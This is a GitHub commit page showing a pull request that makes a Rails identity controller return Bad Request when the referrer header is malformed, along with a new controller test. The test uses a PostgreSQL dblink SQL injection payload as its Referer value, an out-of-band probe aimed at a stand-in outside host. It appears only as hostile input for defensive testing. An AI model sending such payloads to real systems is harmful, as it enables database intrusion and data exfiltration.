Skip to content

Commit

Permalink
Merge pull request #28 from 18F/jgs/lg-690-handle-bad-referrer-error
Browse files Browse the repository at this point in the history 
[LG-690] Handle bad referrer
  • Loading branch information
@jgsmith-usds
jgsmith-usds authored Oct 1, 2018
2 parents 098c136 + 0485b1b commit b3297a0
Show file tree
Hide file tree
Showing 2 changed files with 26 additions and 4 deletions.
16 changes: 12 additions & 4 deletions app/controllers/identify_controller.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,8 @@ class IdentifyController < ApplicationController
CERT_HEADER = 'X-Client-Cert'.freeze
REFERER_HEADER = 'Referer'.freeze

delegate :logger, to: Rails

def create
if referrer
# given a valid certificate from the client, return a token
Expand All @@ -14,20 +16,26 @@ def create
# redirect to referer OR redirect to a preconfigured URL template
redirect_to referrer.to_s
else
Rails.logger.warn('No referrer, returning Bad Request.')
render plain: 'Invalid request', status: :bad_request
render_bad_request('No referrer')
end
rescue URI::InvalidURIError
render_bad_request('Bad referrer')
end

private

def render_bad_request(reason)
logger.warn("#{reason}, returning Bad Request.")
render plain: 'Invalid request', status: :bad_request
end

# :reek:UtilityFunction
def token_for_referrer
cert_pem = client_cert
token = if cert_pem
process_cert(cert_pem)
else
Rails.logger.warn('No certificate found in headers.')
logger.warn('No certificate found in headers.')
TokenService.box(error: 'certificate.none', nonce: nonce)
end
CGI.escape(token)
Expand All @@ -49,7 +57,7 @@ def process_cert(raw_cert)

cert.token(nonce: nonce)
rescue OpenSSL::X509::CertificateError => error
Rails.logger.warn("CertificateError: #{error.message}")
logger.warn("CertificateError: #{error.message}")
TokenService.box(error: 'certificate.bad', nonce: nonce)
end

Expand Down
14 changes: 14 additions & 0 deletions spec/controllers/identify_controller_spec.rb
View file
Original file line number Diff line number Diff line change
Expand Up @@ -28,6 +28,20 @@
end
end

describe 'with a malformed referrer' do
before(:each) do
allow(Figaro.env).to receive(:identity_idp_host).and_return('example.org')
@request.headers['Referer'] =
"cast((SELECT dblink_connect('host=xyz'|" \
"|'123.example.com user=a password=a connect_timeout=2')) as numeric)"
end

it 'returns http bad request' do
get :create, params: { nonce: '123' }
expect(response).to have_http_status(:bad_request)
end
end

describe 'with a good referrer' do
before(:each) do
allow(Figaro.env).to receive(:identity_idp_host).and_return('example.com')
Expand Down

0 comments on commit b3297a0

Please sign in to comment.